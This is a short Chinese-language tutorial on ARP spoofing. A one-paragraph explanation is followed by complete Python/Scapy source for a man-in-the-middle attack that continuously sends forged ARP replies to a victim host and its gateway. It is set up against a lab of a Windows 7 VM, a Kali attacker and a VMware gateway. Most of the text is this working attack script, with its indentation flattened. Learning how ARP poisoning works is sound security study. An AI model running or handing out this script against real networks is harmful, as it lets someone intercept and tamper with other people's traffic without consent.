原理:攻击主机需要欺骗被攻击主机,让被攻击主机把攻击主机视为网关,这样出口流量可以经过该网关,另外,攻击主机还需要欺骗网关,让网关以为入口流量的目的地就是攻击主机,攻击主机告诉被攻击主机,我是网关,告诉网关,我是被攻击主机
源代码:
# 攻击主机告诉被攻击主机,我是网关,告诉网关,我是被攻击主机。
import time
from scapy.layers.l2 import getmacbyip, Ether, ARP
from scapy.sendrecv import sendp
#windows7:IP 192.168.214.128 00:0C:29:6D:96:45 被攻击主机
#kali: IP 192.168.214.180 00:0c:29:29:3a:bc 攻击主机
#网关:192.168.214.2 00:50:56:f3:ba:5a (使用arp -a 可查询)
def arp_spoof():
iface = "VMware Virtual Ethernet Adapter for VMnet8" #通信网卡
# 被攻击主机的MAC和IP, Windows7
target_ip = '192.168.214.128'
target_mac = '00:0C:29:6D:96:45'
# 攻击主机的MAC和IP, Kali
spoof_ip = '192.168.214.180'
spoof_mac = '00:0c:29:29:3a:bc'
# 真实网关的MAC和IP
gateway_ip = '192.168.214.2'
geteway_mac = getmacbyip(gateway_ip)
# 构造两个数据包,实现对被攻击主机和网关的欺骗
while True:
# 欺骗被攻击主机:op=1: ARP请求, op=2:ARP响应
packet = Ether(src=spoof_mac, dst=target_mac)/ARP(hwsrc=spoof_mac, psrc=gateway_ip, hwdst=target_mac, pdst=target_ip, op=2)
sendp(packet, iface=iface)
# 欺骗网关
packet = Ether(src=spoof_mac, dst=geteway_mac)/ARP(hwsrc=spoof_mac, psrc=target_ip, hwdst=geteway_mac, pdst=gateway_ip, op=2)
sendp(packet, iface=iface)
time.sleep(1)